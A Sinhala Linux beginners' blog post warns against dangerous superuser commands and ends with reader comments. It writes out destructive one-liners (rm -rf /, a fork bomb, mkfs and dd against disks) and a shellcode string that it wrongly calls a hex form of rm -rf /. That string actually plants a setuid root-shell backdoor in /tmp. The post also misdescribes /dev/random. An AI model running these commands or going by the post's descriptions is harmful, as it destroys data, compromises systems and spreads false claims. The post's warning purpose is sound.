දැන් ඉතිං විධාන ගැනත් සුපර් යූසර් ගැනත් තරමක් දුරට දැනගෙනනේ ඉන්නේ. සුපර් යූසර් විදිහට පද්ධතිය භාවිතා කරන විට ඉතා ප්‍රවේශමෙන් විධාන කල යුතුය. නැත්නම් පද්ධතිය නැවත භාවිතා කිරීමට නොහැකි ලෙසටම විනාශ වී යා හැකිය. අද කථා කරන්න යන්නේ කිසිදිනක භාවිතා නොකල යුතු විධාන කිහිපයක් පිළිබඳවයි. ඒවා පහත එකිනෙක විස්තර කර ඇත.



  1. rm -rf / විධානය. - හැමදේම නැති කරයි.
    කිසි විටකත් :~# rm -rf / විධානය භාවිතා නොකරන්න. මෙම විධානය අර්ථය පහත දක්වා ඇත.
    rm – දෙනු ලබනෆයිල්ස් ස්ථීරවම ඉවත් කරන්න.
    -rf – මෙම විකල්ප විධානයන්ගේ තේරුම. සියලුම ෆෝල්ඩර හා ඒවායේ උප-ෆෝල්ඩර වල අන්තර්ගත සියළුම දත්ත තහවරු කිරීමකින් තොරව සම්පූර්ණයෙන්ම ඉවත් කරන්න.
    / – මෙයින් කියවෙන්නේ මෙම විධානය / හෙවත් රූට් ෆෝල්ඩරයෙන් පටන් ගන්න කීයලා. රූට් ෆෝල්ඩරය කියන්නේ ලිනක්ස් පද්ධතියක සියළුම දේවල් අඩංගු ප්‍රධාන ගොනුව.
     බැරි වෙලාවත් මෙම විධානය ධාවනය කලහොත් ඔබට ඔබේ පද්ධතිය නැවත ස්ථාපනය කිරීමට සිදුවේ.
    මෙම විධානය ක්‍රියාත්මක කිරීම සඳහා සුපර් යූසර් වීම අත්‍යාවශ්‍යය වේ. එම නිසා අත් වැරද්දකින් මෙය සිදුවීමට තිබෙන ඉඩකඩ අඩුය. නමුත් පෙර සුපර් යූසර් ලිපියේ සඳහන් කල පරිදි ඔබ වරක් සුපර් යූසර් වී log-out නොවුන හොත් ඕනෑම කෙනෙකුට මෙම විධානය පහසුවෙන් ක්‍රියාත්මක කර ඔබගේ සම්පූරණ පද්ධතියම විනාශ කල හැකිය.

  2.  rm -rf / විධානයේ අප්‍රකට ආකාරයක්.
    කිසිවිටකත් පහත ආකාරයේ විධාන ක්‍රියාත්මක නොකරන්න.
    char esp[] __attribute__ ((section(“.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;
     මේ තිබෙන්නේ ඉහත සාකච්ඡා කල rm -rf / විධානයේම වෙනත් ආකාරයක්. ඇත්තටම් මේ තියෙන්නේ rm -rf / විධානයේ hex version එකය.
    මෙවැනි විධාන හෝ මෙවැනි කේතයක් ඇතුලත් කුමන හෝ විධානයක් ක්‍රියාත්මක් කිරීමෙන් වැලකීම නුවණට හුරුය. ඔබ ලිනක්ස් වල ප්‍රවීණයෙක් නම් හෝ ඔබට කරන්න යන දේ හොඳටම විශ්වාසී නම් පමණක් මෙවැනි hex ආකාරයේ විධාන භාවිතා කරන්න.

  3. bash අතු බෝම්බය.
    අපි bash කියන්නේ මොකද්ද කියලා පසුව සවිස්තරත්මකව කථා කරමු. දැන් මේ පහත තිබෙන කේතය දිහා බලන්න.
    :(){ :|: & };: 
    බැලූබැල්මට නම් හරිම සරල තනි පේළියේ විධානයක් වගේ. නමුත් මෙම විධානයෙන් කරන්න පුලුවන් විනාශය ඉතා විශාලයි.
    මේ කුඩා පේළියෙන් අලුත් bash function එකක් නිර්මාණය කරනවා. ඒ එකෙන් සිදුවන්නේ එම function එකම යලි යලිත් නිර්මාණය වී, පිටපත් වෙවී ක්‍රියාත්මක වීමය. එනම් පහත රූපයේ පරිදි අතු බෙදෙන ආකාරයට.මෙසේ මෙම function එක ක්‍රියාත්මක වන විට අපගේ මධ්‍ය සකසනය (CPU) වගේම තාවකාලික මතකයද (RAM) සිය උපරිමයෙන් ක්‍රියාත්මක වී පරිගණකය අකර්මණ්‍ය වනවා.


    ඉතාම කුඩා bash function එකක් පවා අති ප්‍රබලය. එම නිසා ඉතාම ප්‍රවේශමෙන් bash function සමඟ ගනුදෙනු කරන්න.
  4. mkfs.ext4 හාඩ් ඩිස්ක් ෆෝමැට් කරයි.
    කිසි විටෙක :~# mkfs.ext4 /dev/sda1 වැනි විධාන ක්‍රියාත්මක නොකරන්න. මෙම විධානය පහත අර්ථ පැහැදිලි කර ඇත.
    mkfs.ext4 – දෙනු ලබන උපකරණයක් සඳහා (බොහෝ විට ද්‍රඩ තැටි සඳහා) ext4 ආකාරයේ නව ෆයිල් පද්ධතියක් නිර්මාණය කරයි.
    /dev/sda1 – අප භාවිතා කරන දෘඩ තැටියේ පළමු පාටිශන් එක.
     එනම් ඉහත විධානය අනුව අපගේ පද්ධතියේ boot files පවා තිබෙන මුල් පාටිශන් එක ෆෝමැට් වීම සිදුවේ. සිදුවන විනාශය කියන්න ඕනේ නෑනේ.
     කිසිම විටක කෙලින්ම /dev/sd* ආකාරයේ ගොනු සමඟ සෘජු විධාන භාවිතයෙන් වළකින්න.

  5. dd ප්‍රාථමික මට්ටමින් ෆයිල්ස් කොපි කරයි.
    dd විධානයෙන් සිදුවන්නේ ප්‍රථමික මට්ටමේ පිටපත් කිරීම්ය. උදාහරණයක් ලෙස පහත විධානය බලන්න.
    dd if=/dev/random of=/dev/sda මෙහි අර්ථය,
    dd – එක ස්ථානයක සිට දෙනු ලබන ස්ථානයක් දක්වා ප්‍රාථමික මට්ටමින් කොපි කිරීම සිදු කරයි.
    if=/dev/random – කොපි කලයුතු ෆයිල්ස් ලෙස එනම් ආදාන මූලාශ්‍රය ලෙස /dev/random ස්ථානයේ තිබෙන දත්ත විධානයට ලබදෙයි. මෙම ස්ථානයේ බොහෝවිට තිබෙන්නේ බිංදු වලින් පිරුනු වැඩකට නැති දත්ත වේ. /dev/zero ස්ථානයද එවැනි දත්ත තිබෙන ස්ථානයකි.
    of=/dev/sda – දත්ත පිටපත් වීම සිදුවිය යුතු ස්ථානයයි මෙහි දක්වා තිබෙන්නේ. /dev/sda කියන්නේ අපි දැන් වැඩ කරන ප්‍රයෝජනයට ගන්න පාටිශන් එකක්ය.
     එනම් මෙම විධානය ක්‍රියාත්මක කල පසු අපි දැනට වැඩ කරන පාටිශන් එකකට කිසිම වැඩක් නැති දත්ත පිටපත් වී අපේ වැඩ කරන පාටිශන් එක විනාශ වී යයි.

  6. mv ~ dev/null ෆෝල්ඩරය කළු කුහරයකට දමයි.
    dev/null කියලා කියන්නේ ලිනක්ස් පද්ධතියක තිබෙන තවත් විශේෂ ස්ථානයකි. මෙය හරියට කළු කුහරයක් වැනිය. එනම් මෙතනට යමක් දානවා කියන්නේ එය විනාශ කිරීමට සමාන දෙයකි. නමුත් dev/nullහිත් විශේෂ භාවිත ලිනක්ස් වල තියෙනවා. ලිනක්ස් එක්ක වැඩ කරන් යද්දි ඉදිරියේදී අපිට ඒව හමු වෙවී. දැන් අපි මේ විධානය පැහැදිලි කරගමු.
    mv – දෙනු ලබන ෆයිල්ස් හෝ ඩිරෙක්ටර වෙනත් තැනට මාරු කිරීම.
    ~ – අපගේ සම්පූර්ණ home ඩිරෙක්ටරය ඉදිරිපත් කිරීමට ටර්මිනල්යේදි භාවිතා කරන සංකේතයයි.
    /dev/null – අපගේ ඩිරෙක්ටරයේ සියළුම දත්ත /dev/null ස්ථානයට මාරු කරයි. එනම් එම සියළුම දත්ත විනාශ කරයි.
      අවබෝධයෙන් තොරව /dev/null සමඟ ගනුදෙනු කිරීමෙන් වළකින්න.
 මේ ආකාරයෙන් කෙටියෙන් ඉදිරිපත් කලේ කිසිවිටෙක ක්‍රියාත්මක නොකල යුතු විධාන කිහිපයකි. ඇත්තෙන්ම මෙම විධාන භාවිතා කලයුතු අවස්ථා ලැබෙන අතර කිසිවිටෙක නොකරන්න එපාය කියා කියන්නේ එම විධාන සමඟ ඉහත සාකච්ඡා කල විකල්ප විධාන හෝ භාවිතා නොකල යුතු ස්ථානය. එය තේරුම්ගෙන ඉතාම ප්‍රවේශමෙන් ඉහත විධාන භාවිතා කරන්න.

3 අදහස්...:

ෂදීශ් ගේ සටහන October 1, 2012 at 10:44 PM  

එක හරි....දිගටම බලනවා....

ෂදීශ් ගේ සටහන October 1, 2012 at 10:44 PM  

එක හරි....දිගටම බලනවා....

Anonymous October 2, 2012 at 3:11 PM  

Great Job...Learned a lot...

මූණූ පොතින් බ්ලොග් එකට Linux Sinhala

Post a Comment

share


ලිනක්ස් ගැන ඉගෙනගන්න ආසාවෙන් ඉන්න අයට සිංහලෙන් අත් වැල.

මූණු පොතේ අපි..

Get Linux

Get GNU/Linux

සින්ඩි...

සිංහල බ්ලොග් කියවනය

-------------------------

------------------------

Geek.lk

------------------------

lankeeya sithuwili

------------------------

පෝෂක ලබාගන්න